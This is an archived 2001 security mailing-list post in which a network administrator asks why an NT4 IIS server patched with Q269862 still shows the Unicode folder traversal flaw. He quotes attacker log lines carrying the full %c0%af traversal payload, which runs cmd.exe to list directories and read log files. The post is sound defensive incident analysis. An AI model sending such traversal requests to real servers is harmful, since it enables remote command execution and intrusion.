Security Incidents mailing list archives
Web Server Folder Traversal
From: "Portnoy, Gary" <gportnoy () BELENOSINC COM>
Date: Tue, 27 Feb 2001 14:52:57 -0500
Hello,

This question may have a very easy answer, but I don't know what it is, and I am a little stumped. Following the recent thread about NT compromises due to the Unicode folder traversal vulnerability, I decided to double-check my servers. And lo and behold, I found one that was vulnerable; however, the MS patch Q269862 has been applied to it. I am thinking WTF? So I look through the logs and see the following:

11:21:01 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"dir%20c:\" 200 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) -
11:21:15 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"dir%20c:\winnt\system32\logfiles\" 200 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) -
11:21:24 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"dir%20c:\winnt\system32\logfiles\W3SVC1\" 200 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) -
11:21:42 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"type%20c:\winnt\system32\logfiles\W3SVC1\ex001210.log" 502 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) -

Looks like someone has tried to take advantage of it yesterday. But I am pretty sure that I should not be seeing the Unicode characters in the logs. In the logs it should be showing up as /msadc/../../../../../../winnt/system32/whatever.exe. So, I do a default installation of IIS just to confirm:

19:09:19 10.1.1.62 GET /msdac/../../../../../../winnt/system32/cmd.exe 404
19:09:27 10.1.1.62 GET /scripts/../../../../../../winnt/system32/cmd.exe 200

Yep, that's indeed the case, so why am I seeing the above in the logs, and why am I still vulnerable, even though the patch is applied? Could this perhaps be related to the order the patches were applied, or is there some other dependency?

This is NT4 SP5, with almost all the released security patches, or so I thought....

Gary Portnoy
Network Administrator
gportnoy () belenosinc com
PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C
Current thread:
- Web Server Folder Traversal Portnoy, Gary (Feb 28)
- Re: Web Server Folder Traversal Chris Keladis (Feb 28)